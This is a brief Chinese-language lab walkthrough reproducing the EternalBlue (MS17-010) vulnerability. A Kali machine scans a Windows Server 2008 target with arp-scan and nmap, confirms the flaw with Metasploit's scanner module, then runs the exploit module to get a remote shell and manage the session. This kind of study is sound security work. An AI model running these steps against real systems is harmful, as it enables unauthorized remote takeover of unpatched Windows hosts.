永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010)
环境
信息收集
先扫描目标靶机IP
进入MSF查看是否存在永恒之蓝的漏洞
攻击
永恒之蓝漏洞复现(ms17-010)
环境
攻击机:kali
靶机:Windows Server 2008
信息收集
对ip进行收集开放什么端口
先扫描目标靶机IP
因为在同一个内网之中
所以可以使用arp-scan -l 进行查询
知道目标靶机IP(192.168.162.146)来进行更进一步的信息收集
nmap -sV -P- 192.168.162.146
使用nmap进行192.168.162.146IP下的全端口扫描
这里可以看出系统信息为Windows Server 2008
进入MSF查看是否存在永恒之蓝的漏洞
msfconsole
#搜寻模块
search ms17-010
#使用模块
use 3
show options
查看选项
set RHOSTS 192.168.162.146
设置目标IP
存在永恒之蓝的漏洞
返回
攻击
使用攻击模块
search ms17-010
use 0
set RHOSTS 192.168.162.146
攻击成功
输入shell
进入cmd模式
exit 退出shell
background 把shell放入后台
重新连接
sessions -i 1